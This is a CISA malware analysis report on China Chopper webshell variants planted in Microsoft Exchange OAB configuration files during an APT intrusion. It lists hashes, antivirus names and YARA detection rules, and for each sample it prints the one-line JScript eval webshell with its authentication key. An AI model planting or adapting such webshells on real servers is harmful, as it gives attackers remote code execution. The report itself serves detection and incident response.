Analysis Report

MAR-10365227-3.v1 - Impacket 3

Release Date
Alert Code
AR22-277C

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Disclosure is not limited. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA) to provide detailed analysis of files associated with "China Chopper" webshells. CISA obtained China Chopper malware samples during an on-site incident response engagement at a Defense Industrial Base (DIB) Sector organization compromised by advanced persistent threat (APT) actors.



CISA analyzed 15 files associated with China Chopper malware. The files are modified Offline Address Book (OAB) Virtual Directory (VD) configuration files for Microsoft Exchange servers. The files have been modified with a variant of the China Chopper webshell. The webshells allow an attacker to remotely access the server and execute arbitrary code on the system(s).



For more information on the confirmed compromise, see Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

MAR-10365227.r3.v1 STIX XML (XML, 3.02 MB )
Submitted Files (15)

07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9 (a96r741S.aspx)

1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3 (cBP0VKYG.aspx)

1e05b263cfea600f727614e58646a2ff6a4c89a4499e2410f23bf40c718a94d3 (ZyphzweO.aspx)

1f5f5b8dd702da3628e8612d44563d8267fa160048a0da389ee821152ac658f2 (nypCBAQf.aspx)

3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650 (vsaUptfA.aspx)

411fef05a37e286a4e48700e5155cd55672cce4c9283b448d968391267b4f866 (pRd3rIlG.aspx)

53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c (vqk8w97H.aspx)

58a6151413f281143a9390852b017b82ff40d402cdbc8295aa58ae46c4c8424f (ydRlt1rF.aspx)

a58c4fdb1c31100f4e9bb530af7d1ac57c715fee1c7c5e6c790e1e9cc863cfe4 (0GPd9cCt.aspx)

a8c656d12b10d4fae74efc4cc7e585f5569f1a9144ebf6cd56b1bfed0dd7a440 (undMk5U9.aspx)

b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8 (AXYD37GQ.aspx)

dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f (PcyJLpmw.aspx)

dfa9f4a054636750012e0ff56286a3c96c37062959c8ac5b2df52e349de69e65 (GLuRqYO7.aspx)

e2caf75367ca300f616a96ff07769b1f80b69b1ae135fa27b79376a75a905b5e (mDweIri6.aspx)

e5451de048d7b9d6d8e699da7a10c38079eda4e6328580a8ba259a22eeaaa71d (vyBcbDLQ.aspx)

Findings

b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8

Tags

trojanwebshell

Details
Name AXYD37GQ.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 b5be2d3f0ebbb9a0925236f171c5b5e0
SHA1 1c2526572d10d3577802c15125d9c3a701c48919
SHA256 b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8
SHA512 3f5cd073f05c581c46973213e0aebaf3240c1336593901fc66abd3fb79ce70464d45d77629e5e88ec16a3d3fff9f4079807b41aa35401b5ba3ab63406484879c
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaXVMr6j71idfhphE5g8RMlF62E4ONF0qDe8+:kNrdepN1BXS0HM5QZphEGs4ONF0qi
Entropy 4.646463
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.A8133255
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.A8133255 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.A8133255
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["47YyATOi91Po"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "47YyATOi91Po" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 1. -

53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c

Tags

trojanwebshell

Details
Name vqk8w97H.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 264b80ff5d873d630168f21892f27724
SHA1 ae0d3ca3f7bec5703f1bc554f9b57bcdda8022ba
SHA256 53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c
SHA512 7c3cee7a7151417b42eea859c8b5a5f01c9289f02a279d5874ed4ef2dfee15b9dfee012a4f1b050255883a6ce876e72db0047bb6519383d6b76e06f377c5918d
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaHVMr6j71idfhphE5gQaqt62E4ONF0qbenf:kNrdepN1BXS0nM5QZphEZfs4ONF0qS
Entropy 4.651647
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.46E1E12C
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.46E1E12C (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.46E1E12C
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["gmetqypJ4TUw"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "gmetqypJ4TUw" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 2. -

dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f

Tags

trojanwebshell

Details
Name PcyJLpmw.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 d07539a27792c1a1d37dc0b7c5fa0f40
SHA1 82809edc726101e5baea2ae70bcd9cf2e20bdffa
SHA256 dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f
SHA512 bf9afaa2f2fe07708d17f8f5d73638e9df85301e714d7aeae302c14b17fbc3be619ac150330ee302b06bffd1d3b6fc8c1a16ebee62ed353ccf4c3ffcfa636c6c
ssdeep 24:yd53SzMaPfVMNGy1Qcz+rJdrde9j3yhm6jq6j71idfhphE5Jl+62E4ONF0qTenf:S53/gMyfrdepiz95QZphEfgs4ONF0q6
Entropy 4.649797
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.9109FA0F
ClamAV Asp.Trojan.Webshell0321-9840176-0
ESET ASP/Webshell.DI trojan
Emsisoft Generic.ASP.WebShell.H.9109FA0F (B)
Lavasoft Generic.ASP.WebShell.H.9109FA0F
McAfee Exploit-CVE2021-27065.d
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["49tWiczXqjDb"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "49tWiczXqjDb" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 3. -

3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650

Tags

trojanwebshell

Details
Name vsaUptfA.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 5cbd52c0a7517ddcd8a0e764131bd791
SHA1 f44cecce75f74b62a6596872b8dd86dbca2a59a8
SHA256 3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650
SHA512 96a369b1d92385e1875ce64058c5875c27afdf10dc9163aa38a72a905b77202d17620f2b5ca269404d5f7f165c79b39ffff355a0834cf9d35944b28df4069230
ssdeep 48:kNrdepN1BXS0kwM5QZphEETs4ONF0qdwY:ktde/1yEANCqdwY
Entropy 4.647264
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.6D98F430
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.6D98F430 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.6D98F430
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["OUZz8HlharTm"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "OUZz8HlharTm" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 4. -

07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9

Tags

trojanwebshell

Details
Name a96r741S.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 bd01f935103002ccf3a21c9815697c24
SHA1 7517f601fc648bb731961d492b638f4d39e698fa
SHA256 07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9
SHA512 a38c05fa1814cebdfea51520eabf7c133d229b7c6aadd1792e2cffcd29d733c7d590411f6881573087c1fdc82e6293e32eab7cc42fe3b7c908ca0d4ca89f527e
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaVfVMr6j71idfhphE5gMPAF62E4ONF0qHenf:kNrdepN1BXS01M5QZphEJes4ONF0qe
Entropy 4.647271
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.CCB2735F
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.CCB2735F (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.CCB2735F
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["xncSsoZepUEz"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "xncSsoZepUEz" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

Figure 5. -

1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3

Tags

trojanwebshell

Details
Name cBP0VKYG.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 d67c8e0b4489979922c5acfff7211186
SHA1 3179101b5d8484a3cb316fb22e4e6aaa60eda94d
SHA256 1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3
SHA512 97e068cab67cb8b597c052ef4905cffc506d97fe1069f9195dbcc882b4808088e83ac37f430f2d43096ff40a8db1e03a133a54ae2fdaf22a33bbfb393a395e57
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaEDVMr6j71idfhphE5gh62E4ONF0qTenf:kNrdepN1BXS0zaM5QZphEws4ONF0q6
Entropy 4.643343
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.E4D70A09
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.E4D70A09 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.E4D70A09
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit"

           Family = "HAFNIUM CVE-2021-27065"

           Description = "Detects HAFNIUM webshell samples"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.



In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:



---Begin Webshell---

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["fYQMESigLnP1"],"unsafe");)</script>

---End Webshell---



The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "fYQMESigLnP1" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots

